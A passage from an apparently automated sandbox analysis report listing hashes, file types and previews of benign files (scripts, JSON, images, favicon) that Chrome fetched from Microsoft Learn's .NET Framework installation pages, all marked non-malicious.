                                                                                                                                                                      SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                      Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:HMB:k
                                                                                                                                                                      MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                      SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                      SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                      SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                      Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):33370
                                                                                                                                                                      Entropy (8bit):7.973675198531228
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                      MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                      SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                      SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                      SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):13339
                                                                                                                                                                      Entropy (8bit):7.683569563478597
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                      MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                      SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                      SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                      SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):17174
                                                                                                                                                                      Entropy (8bit):2.9129715116732746
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):1817143
                                                                                                                                                                      Entropy (8bit):5.501007973622959
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                      MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                      SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                      SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                      SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                      Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5644
                                                                                                                                                                      Entropy (8bit):4.785769732002188
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                      MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                      SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                      SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                      SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):17174
                                                                                                                                                                      Entropy (8bit):2.9129715116732746
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):13842
                                                                                                                                                                      Entropy (8bit):7.802399161550213
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                      MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                      SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                      SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                      SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                      Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):33148
                                                                                                                                                                      Entropy (8bit):4.917595394577667
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                      MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                      SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                      SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                      SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):5644
                                                                                                                                                                      Entropy (8bit):4.785769732002188
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                      MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                      SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                      SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                      SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                      Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):35005
                                                                                                                                                                      Entropy (8bit):7.980061050467981
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                      MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                      SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                      SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                      SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                      Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):4897
                                                                                                                                                                      Entropy (8bit):4.8007377074457604
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                      MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                      SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                      SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                      SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                      Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1173007
                                                                                                                                                                      Entropy (8bit):5.503893944397598
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                      MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                      SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                      SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                      SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):33370
                                                                                                                                                                      Entropy (8bit):7.973675198531228
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                      MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                      SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                      SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                      SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
